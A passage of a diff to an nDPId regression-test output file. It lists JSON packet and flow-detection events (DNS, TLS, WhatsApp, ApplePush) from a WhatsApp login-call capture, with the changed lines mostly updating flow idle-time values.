+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225381,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoSmNAAEAGkvHAqAIEEYKJTcAYAbvMgisDtJzpXVAQQAC7BAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1432582225453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225453,"pkt":"APS5Jrv0xiwDYGpkCABFAAAocjAAAO8GIRIRrGQ1wKgCBAG7wBeUK3Wexa1wmVARn\/7VYwAA"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582225468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225468,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqzoAAO4G6QURrGQ3wKgCBAG7wA0k\/m4nZgZNAlARn\/7PTgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoGflAAEAG6EnAqAIEEaxkNcAXAbvFrXCZlCt1n1AQ\/\/91YgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAooItAAEAGYbXAqAIEEaxkN8ANAbtmBk0CJP5uKFAQ\/\/9vTQAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432582227526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1432582227526,"pkt":"xiwDYGpkAPS5Jrv0CABFAABBdxsAAEARfjvAqAIEwKgCAcq5ADUALb4mNPgBAAABAAAAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAQ=="} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -48,54 +48,54 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432582227595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582227595,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+I5EAAEAR0cjAqAIEwKgCAcveADUAKv\/L36MBAAABAAAAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAQ=="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432582227624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582227624,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+d\/oAAEARfN\/AqAIBwKgCBAA1y94AqhSs36OBgAABAAgAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAC20ABJ5V6TTADAABAAEAAAttAASeVTpKwAwAAQABAAALbQAEuK2zJ8AMAAEAAQAAC20ABJ5VOnfADAABAAEAAAttAAS4rbMlwAwAAQABAAALbQAEnlU6M8AMAAEAAQAAC20ABK4k0i3ADAABAAEAAAttAASeVQXI"} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227884,"flow_last_seen":1432582227884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227884,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1432582227884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227884,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAKwpAAEAG00HAqAIEEbJoDsAzAbunfDOjAAAAALAC\/\/\/+yQAAAgQFtAEDAwQBAQgKLfowvwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} -01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} -00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOx
AiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
-01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 